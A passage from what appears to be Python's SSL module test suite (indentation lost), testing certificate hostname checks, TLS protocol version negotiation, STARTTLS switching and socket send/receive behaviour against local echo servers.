s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
@unittest.skipUnless(
ssl.HAS_NEVER_CHECK_COMMON_NAME, "test requires hostname_checks_common_name"
)
def test_hostname_checks_common_name(self):
client_context, server_context, hostname = testing_context()
assert client_context.hostname_checks_common_name
client_context.hostname_checks_common_name = False
# default cert has a SAN
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
client_context, server_context, hostname = testing_context(NOSANFILE)
client_context.hostname_checks_common_name = False
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLCertVerificationError):
s.connect((HOST, server.port))
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
# TLS 1.3 perform client cert exchange after handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(1000)
s.write(b'should have failed already')
s.read(1000)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
client_ctx, server_ctx, hostname = testing_context()
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = server_ctx.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = client_ctx.wrap_socket(
socket.socket(), server_hostname=hostname
)
client.connect((hostname, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.3')
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
client_context, server_context, hostname = testing_context()
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_tls_version('TLSv1_1')
@ignore_deprecation
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
